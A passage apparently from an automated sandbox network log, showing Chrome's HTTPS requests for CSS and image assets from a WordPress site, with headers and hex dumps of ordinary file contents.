                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 84 0e ca b7 5f 7c b4 36 bb 34 bb de 54 e1 aa db ff a4 1c 48 b2 8c a0 ab 2a 3c 70 05 5d fa d8 a0 d1 4f 88 3a 8a d1 be 82 2b a8 c5 00 2e e2 3f ae 7b 8e ea f7 49 39 a0 df e8 65 0e f1 00 16 07 e0 d2 00 62 80 36 46 02 c7 89 93 68 33 d7 b9 b1 e1 f2 9e bb f4 e4 a7 07 2c 15 d3 24 c0 46 ff 60 dd 1c b0 be fe 80 28 a0 ee fb 2d 14 26 ea c0 06 44 0a 87 60 b3 30 44 f7 60 01 00 b9 40 4f 0f f5 01 49 41 04 00 3e c0 76 28 06 0c 2a aa f3 22 28 82 9c 50 05 c0 af 74 fa 61 45 00 2e 00 88 b0 18 d8 e6 ee 83 26 bf 0d 8b 01 bb 44 36 11 88 f5 80 3e cc 00 62 57 84 82 df c6 44 c0 42 91 b4 fe e3 3e 72 61 2b 21 9f 1d 9d cd 02 62 0f a0 11 cc 00 11 9b 98 4a 25 64 35 de 2e a1 93 5f 4a c5 4f 2b 88 10 fc 82 0a c3 01 9e 81 fc f0 40 56 15 9c 3d 67 cf 4a 89 f9 b9 c9 b9 c9 b0 94 9b 5f 9d 5b c8
                                                                                                          Data Ascii: _|64TH*<p]O:+.?{I9eb6Fh3,$F`(-&D`0D`@OIA>v(*"(PtaE.&D6>bWDB>ra+!bJ%d5._JO+@V=gJ_[
                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 27 af a2 c5 9f ca c1 76 22 15 ec 4d f8 06 d1 eb ab e4 be 5f 2a 39 4b f8 12 3e a6 94 2a 9c 58 0b fb d2 b7 d4 3e b1 73 e7 ee dd e4 ba 6d db b6 4d 2f be d8 dd 4d c2 bf a9 69 10 a0 60 10 b8 c1 4b db 37 3d 51 19 17 90 13 e8 7c 20 ca 04 45 50 1a 8c 46 c9 5b a1 92 41 bb 3d 0c 23 ca 8a 4a 3d 85 b0 ba 18 0e 6f 7e f9 6c c0 5d 90 3b 3f d7 c8 05 58 45 c0 00 01 20 02 e4 21 b4 08 ae df 48 26 01 05 f0 d2 4b 30 20 79 6c 7c 7a 7a ba ad ed c8 89 56 47 cf df e7 fc 8f b2 ab 81 89 f2 3e e3 4e a1 53 e8 22 43 1b 84 2c 02 6b 10 98 e1 3e e0 9d f7 72 80 bd 0f 8e b3 c7 9d 43 cf 17 bd 88 1c 9c ef bd e7 71 57 6f 05 95 6e 13 b5 29 ae e5 24 42 b0 c7 30 d4 50 1c 28 ce c6 ce 49 4c 21 33 91 1c ac 49 23 1a 6c d3 35 59 36 17 3f b6 88 1f 4d 53 17 33 9b ae 7b 9e ff ff 7d df 7b 5f 40 e7 fe 09
                                                                                                          Data Ascii: 'v"M_*9K>*X>smM/Mi`K7=Q| EPF[A=#J=o~l];?XE !H&K0 yl|zzVG>NS"C,k>rCqWon)$B0P(IL!3I#l5Y6?MS3{}{_@
                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 58 48 82 60 01 16 20 d3 00 54 de 68 f2 f3 0b e0 f4 47 0c 20 e1 4f 1e 45 88 01 6f ff f0 98 10 ad 21 80 5b 20 a3 00 e0 24 9c 69 1f aa 69 6f d1 68 b6 b8 94 91 4f d6 87 63 d1 8b dd ad 53 3a f0 cb 83 d3 76 cb be ef 25 cc 03 32 69 f4 17 c0 e6 64 fd 3e 4d 41 62 ed f3 a7 57 9e 3e fd f0 fc 8d e1 4f 67 2b 2b 9f fd 7d d7 f3 cb 89 64 a2 f0 37 85 a7 7f f9 cf ef be 79 37 a7 70 ee c4 e9 0f ae 7c 78 e3 b7 30 2a f8 f0 fe fd bb 77 09 04 2c 92 d0 cf 5b 9e 5a 5e aa 52 b8 fd 57 a7 14 01 5c fb cf e7 7c 29 10 54 2b 5c bf 79 ef 9f ba fc c8 95 40 d7 e6 e6 3f ad 07 40 af 8f bc 65 36 f3 1b f0 07 17 7a ca 4b 3e 71 d3 17 5b e6 8d 00 e0 40 20 c0 8d bd e4 05 6d e8 ab f7 62 22 40 50 60 79 4a 9a 9d ed 25 8c 7f fa a3 a1 17 d3 37 23 c8 02 22 18 ff a3 bc 25 f0 d1 eb 57 af 46 a7 6f 4e 2c ee
                                                                                                          Data Ascii: XH` ThG OEo![ $iiohOcS:v%2id>MAbW>Og++}d7y7p|x0*w,[Z^RW\|)T+\y@?@e6zK>q[@ mb"@P`yJ%7#"%WFoN,
                                                                                                          2024-12-12 11:58:18 UTC16384INData Raw: 85 7c 00 02 f6 7e 0c 02 12 71 e2 05 8a ab 5a 60 12 db 03 58 4b 47 57 9d cf e5 43 7b d0 70 67 6b 3b d6 b5 47 bb c3 89 b5 c2 ca 8b 82 e2 87 74 4d 12 b3 33 b5 fa e7 7c 7a 35 0f 51 16 58 00 5e 10 80 ac 1f c8 67 32 f9 7c 7e 35 2d 4b 0b b9 42 32 0b 6a 20 9d 4e 26 33 99 64 be b0 0a 79 3f 59 c8 e5 65 a4 fb 6e 51 0c 73 81 48 42 91 c2 0e c7 e8 e8 68 f7 a8 a3 75 c0 11 06 0a 90 4a 09 22 10 01 6e 69 c9 99 9a e0 78 1e 54 02 bc 9b a8 64 94 48 4c 89 f1 3c 17 0e 3b dd a4 0e 58 4a 76 f7 fe 9b b1 ab ed 69 eb 3c c3 d1 48 aa c5 88 8c 9a 30 70 aa f0 12 86 0f 23 b5 79 31 08 e7 50 e7 c5 3d a9 c1 c1 c4 04 1b 16 73 30 f8 b5 60 9b 90 e2 d8 44 5e 33 32 99 14 e1 b2 f8 a8 16 15 de 17 4b 51 83 50 96 51 a9 b2 10 7c d8 07 6b 20 3e 95 08 35 da 7e 40 94 6d bf 20 ea 97 49 bb ef e7 39 e7 f8
                                                                                                          Data Ascii: |~qZ`XKGWC{pgk;GtM3|z5QX^g2|~5-KB2j N&3dy?YenQsHBhuJ"nixTdHL<;XJvi<H0p#y1P=s0`D^32KQPQ|k >5~@m I9


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          51192.168.2.2449831147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:18 UTC689OUTGET /wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rangeSlider.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:18 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:18 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 13296
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:18 UTC13296INData Raw: 2f 2a 2a 0a 49 6f 6e 2e 52 61 6e 67 65 53 6c 69 64 65 72 2c 20 32 2e 33 2e 31 0a c2 a9 20 44 65 6e 69 73 20 49 6e 65 73 68 69 6e 2c 20 32 30 31 30 20 2d 20 32 30 31 39 2c 20 49 6f 6e 44 65 6e 2e 63 6f 6d 0a 42 75 69 6c 64 20 64 61 74 65 3a 20 32 30 31 39 2d 31 32 2d 31 39 20 31 36 3a 35 31 3a 30 32 0a 2a 2f 0a 2e 69 72 73 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 20 6e 6f 6e 65 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 2d 6b 68 74 6d 6c 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65
                                                                                                          Data Ascii: /**Ion.RangeSlider, 2.3.1 Denis Ineshin, 2010 - 2019, IonDen.comBuild date: 2019-12-19 16:51:02*/.irs { position: relative; display: block; -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-sele


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          52192.168.2.2449832147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:18 UTC404OUTGET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:18 UTC243INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:18 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:53 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 68
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:18 UTC68INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0b 49 44 41 54 18 57 63 60 60 00 00 00 03 00 01 68 26 59 0d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                          Data Ascii: PNGIHDRIDATWc``h&YIENDB`


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          53192.168.2.2449833147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:18 UTC621OUTGET /wp-content/uploads/2022/10/Home-3-1.jpg HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:19 UTC247INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:18 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 05 Oct 2023 20:28:06 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 42000
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/jpeg
                                                                                                          2024-12-12 11:58:19 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 01 4a 02 01 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 05 02 01 00 06 07 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 8f 4d 92 61 b8 15 30 2f
                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222J"Ma0/
                                                                                                          2024-12-12 11:58:19 UTC16384INData Raw: 18 89 9d 19 9b 17 a6 c8 c9 fd 4e 85 15 ac 52 5c c5 99 cc 5b 14 bc 93 35 32 e9 1b 1e 38 a7 c3 33 b9 63 4c 98 e3 8a b5 1d 0d cc 9f 71 17 c3 68 dd a1 ca 11 73 45 e0 cb d4 cd 83 7e e5 e0 c5 0a 3a bf c9 48 97 36 ff 00 06 8c 96 1e 48 cd 22 b2 c3 d9 15 c8 e3 5e 85 24 a8 52 38 96 34 cd 33 32 1f e9 ff 00 25 f0 e6 5b 7f 26 b7 56 6e ca a9 3a 1e 4a 65 4c be 17 c1 a1 bc 9d 54 8f b5 7f 05 1c 9c 19 58 7e 37 d9 a2 8e 6a bd c7 09 53 3c 4b e1 af 63 95 9f b8 e7 91 4c cd 9b 88 dd 97 b9 b9 73 c7 0d ac 5f 0c e4 67 d4 9b dc b4 d9 a6 75 1d 79 fa f0 d8 70 de 3c 39 90 e5 82 b2 c7 b9 bc 58 e7 35 e1 7f 83 6f cd 5e e4 db ee 2f e9 91 4a a3 68 99 63 1c c7 24 d7 a3 34 e2 e3 44 cd 0f c4 5b c9 ff 00 c7 33 f5 3f 0f f0 6a c0 7f 06 a8 b4 73 d0 d1 8d 08 9f 72 32 36 1a d9 97 83 6c 72 96 e6 9e
                                                                                                          Data Ascii: NR\[5283cLqhsE~:H6H"^$R8432%[&Vn:JeLTX~7jS<KcLs_guyp<9X5o^/Jhc$4D[3?jsr26lr
                                                                                                          2024-12-12 11:58:19 UTC9232INData Raw: 02 9c 58 56 e1 28 e6 b8 e5 82 af 71 1c ca dc 5e 1f da 15 f7 1d 28 60 97 61 d5 c1 95 63 47 03 26 e8 8b 79 92 db 3d 6e a1 80 12 81 a3 08 2b 24 aa ee 13 b9 27 80 7d c1 90 bc a0 65 ab 03 0a 44 89 e8 aa c1 04 5b a9 68 74 88 70 b2 c0 2e 64 cd f8 39 20 b8 e7 01 6f dc b6 fe b4 29 7c 41 20 2b a6 4b fe 2f bf 89 7b 17 05 ca a7 a4 f8 94 f4 2a e5 34 14 98 ea 33 42 f9 07 8b fc 8e 62 ca cb 0b a3 a7 dc ad 02 f0 fe 73 bf 68 22 dc 8a f0 1e 25 3b 2b 70 cd 02 d6 12 48 1c 0b 2b 32 c2 b4 bf 43 89 8a 9d 46 8e d5 14 ca 17 fa 8f 5b f9 23 0c 15 e4 b9 4b 51 9b e1 22 70 04 c5 c1 cb e1 f8 f1 09 ca ed 0f fa d5 45 f6 0e e3 f8 87 15 01 58 6c a7 be 7d 91 59 83 63 a6 28 16 0e 2e d0 5f 19 ec f4 81 00 47 aa 27 bd a5 ba 89 11 3b 48 fc c0 74 b8 53 fe 25 3c dd 55 c0 e8 78 c6 fa 24 cf 97 b3 7f
                                                                                                          Data Ascii: XV(q^(`acG&y=n+$'}eD[htp.d9 o)|A +K/{*43Bbsh"%;+pH+2CF[#KQ"pEXl}Yc(._G';HtS%<Ux$


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          54192.168.2.2449834147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:19 UTC390OUTGET /wp-content/plugins/gtranslate/flags/16/it.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:19 UTC244INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:19 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 10 May 2024 09:01:28 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 440
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:19 UTC440INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 01 3e 49 44 41 54 78 da a4 93 3d 4e c3 40 10 85 bf 8d 6d 40 0a 24 82 22 4d 4a 3a 84 c4 55 10 34 dc 06 ae 43 01 9c 24 05 a2 46 10 c4 9f 28 42 62 13 67 7f ec 1d 8a 58 71 0c 76 a4 28 23 ad 76 46 a3 7d fb 66 e6 8d 12 11 36 31 05 6c 01 bb c5 bd 8e 59 e0 27 04 ba 67 77 57 5f 7f b3 37 a7 97 95 f8 fd fc e2 1f 42 ff f6 ba 17 02 ed dc e7 9c f4 0e 57 7e b7 75 7c 54 50 56 08 82 b9 7f 00 68 87 40 e0 7c 46 62 53 46 3a 69 04 c8 86 2f 0b 3f 38 d8 47 9c 03 08 42 00 e3 1c 13 3d
                                                                                                          Data Ascii: PNGIHDRapHYs cHRMz%u0`:o_F>IDATx=N@m@$"MJ:U4C$F(BbgXqv(#vF}f61lY'gwW_7BW~u|TPVh@|FbSF:i/?8GB=


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          55192.168.2.2449836147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:19 UTC389OUTGET /wp-content/uploads/2021/09/logo.pnbianco.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:20 UTC246INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:19 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 15 Sep 2021 15:18:18 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 78597
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c a4 00 00 05 6c 08 06 00 00 00 bc 2c a4 f8 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e5 09 0f 0f 11 14 9d 71 e2 e6 00 00 20 00 49 44 41 54 78 da ec dd df 75 64 37 92 27 e0 88 71 80 f4 80 1c 0b 98 1e 10 6d 41 d7 5a 30 5a 0b 56 1e 74 8d 05 ab b5 60 d5 16 4c af 05 03 7a 90 b4 60 48 0f 48 0b b0 0f ca 3e 47 a3 3f 55 24 32 49 00 f7 7e df 39 7a 52 a1 0a 19 81 8b 7c b9 bf 8c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: PNGIHDRl,bKGDpHYs.#.#x?vtIMEq IDATxud7'qmAZ0ZVt`Lz`HH>G?U$2I~9zR|
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 84 40 0a 00 00 00 00 c0 6d aa 9d 75 4d eb 30 27 4b e8 bd 15 c3 3c 38 f3 7f 9c a1 8e 9a e3 29 84 04 00 00 00 00 c0 0d 10 48 01 00 00 00 00 b8 4d b5 b3 ae 69 1d 5f 12 11 ef c5 ad 18 33 38 4c b2 0e 01 85 c5 ce fc 33 6e d1 b2 d7 00 00 00 00 00 37 e4 bf 68 01 00 00 00 00 c0 4d ea fd 50 bd 6d b5 80 cc 7c 2c a5 3c da 8a a9 bc 9f c2 24 5b 28 6e 55 a1 00 00 20 00 49 44 41 54 68 a5 94 7f d2 d2 a1 6a 99 23 44 d6 4a 29 ff cb 76 0c f5 dc 31 3b 43 df 11 00 00 00 00 00 cc 4f 20 05 00 00 00 00 e0 c6 64 e6 a1 94 72 d7 51 fa 16 11 9f 1b fc fc ef 4a 29 7f 28 a5 3c d8 8d 29 e7 e3 a3 94 f2 5d 44 7c 7f e6 3f d5 8a 40 ca 68 75 86 45 44 44 cb 4c bb 31 c1 d9 1f 11 af 17 9e 9d a6 d3 00 00 00 00 00 b7 e3 77 5a 00 00 00 00 00 70 73 6a 67 dd eb 39 3f 34 33 ef 33 f3 b5 fc ed a6 04 61
                                                                                                          Data Ascii: @muM0'K<8)HMi_38L3n7hMPm|,<$[(nU IDAThj#DJ)v1;CO drQJ)(<)]D|?@huEDDL1wZpsjg9?433a
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 8b 97 8f 1b 6e c5 99 a4 47 e0 19 ad 9f bc 30 18 42 26 b2 6e a8 15 5c b9 d4 c3 00 f3 95 52 ba 8c be 4e 64 3a 76 4a ca 2c d7 4a 1f 62 fb ee 7b ea c9 28 5f 53 4a de d1 b3 cf 39 ff 21 ea 9d bc f8 57 07 7a 1b 98 20 09 a1 d0 a6 3b 5d d0 f4 fa f3 26 a5 34 a4 94 3e 44 c4 7f 45 c4 ef b1 2d 52 fa 52 82 ca 75 44 7c 2d ff ce ff 49 29 9d d5 de 4b 49 48 81 11 94 97 72 3d 6d 08 07 a3 0a b3 b4 71 42 12 c0 8b 8e 73 ce e6 88 e1 0a 00 00 20 00 49 44 41 54 97 ba 01 60 12 7a 2a a6 b0 88 dd 7c cc 06 1a 54 aa ff b6 7c 0a da 89 51 64 02 6a 3d 67 af 4b 75 7c 00 ec 4f 7b b2 34 a4 b3 b3 8e 6d 41 a6 29 bb 4e 29 29 ac c9 14 f6 e8 9b d8 06 02 02 cc 6d fe 53 40 14 da 74 d7 d0 bd 9a 67 9e 9f 87 d7 29 a5 65 4a e9 24 a5 f4 21 a5 94 22 e2 ff 44 c4 7f 96 7f fe 6f fa 87 93 94 d2 45 f9 77 76
                                                                                                          Data Ascii: nG0B&n\RNd:vJ,Jb{(_SJ9!Wz ;]&4>DE-RRuD|-I)KIHr=mqBs IDAT`z*|T|Qdj=gKu|O{4mA)N))mS@tg)eJ$!"DoEwv
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: b0 11 30 1b 01 da 08 86 8d 00 39 02 e3 08 2c 47 30 38 02 6b 22 58 26 82 d5 44 60 88 e0 40 04 07 22 a8 fb 87 1a 9b f5 0e 20 40 2d 75 55 bf ef f3 f8 f1 9e 7b c7 1a 75 75 a9 fa ab ea fa be 82 16 f4 95 57 67 69 b7 f2 ff 27 d5 d7 80 2d 8d 97 cb d4 5d 8d f2 25 2b c9 ca 8c 59 bf 71 45 61 08 5a 70 e6 14 3f 60 83 d8 f3 26 c9 d7 4a bf fe e8 12 b9 4b 29 a7 03 c4 11 b7 7d c5 7a 00 d8 95 79 ea 5e c7 bf 34 17 9a b4 16 e3 a6 99 db 0a 00 00 30 4d 12 52 78 b7 be c2 db 89 96 a0 11 e7 9a 00 77 de a7 0b 00 00 20 00 49 44 41 54 78 94 94 d2 aa 1f fb d3 cd 00 de 3b 5e 9e a7 de 8d 81 2f 39 88 8d 01 98 bb 80 fe 0c 8c 49 ad c5 15 c6 98 78 37 77 7f 00 a8 5d 03 27 f8 1e 24 b9 74 27 27 6b d5 e0 35 d9 33 02 00 00 30 51 12 52 d8 06 9b 06 68 c9 81 4d da 40 f2 c7 cb ac 1f 1a be c4 8b 3e
                                                                                                          Data Ascii: 09,G08k"X&D`@" @-uU{uuWgi'-]%+YqEaZp?`&JK)}zy^40MRxw IDATx;^/9Ix7w]'$t''k530QRhM@>
                                                                                                          2024-12-12 11:58:20 UTC13061INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 0e 01 da 00 00 20 00 49 44 41 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: ( IDAT


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          56192.168.2.2449835147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:19 UTC380OUTGET /wp-content/uploads/2021/08/logo.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:20 UTC246INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:20 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 14:34:53 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 80326
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
